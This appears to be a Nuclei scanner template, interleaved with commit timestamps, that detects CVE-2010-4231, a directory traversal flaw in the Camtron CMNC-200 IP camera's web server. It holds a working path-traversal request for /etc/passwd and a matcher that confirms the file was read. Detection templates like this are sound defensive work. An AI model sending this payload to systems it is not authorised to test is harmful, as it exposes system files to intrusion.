2021-07-16 17:29:30 +00:00
id : CVE-2010-4231
info :
name : Camtron CMNC-200 IP Camera - Directory Traversal
author : daffainfo
severity : high
2021-07-20 14:20:02 +00:00
description : The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
2021-08-18 11:37:49 +00:00
reference :
2021-07-20 14:20:02 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
2021-07-16 17:29:30 +00:00
tags : cve,cve2010,iot,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-16 17:29:30 +00:00
- type : status
status :
- 200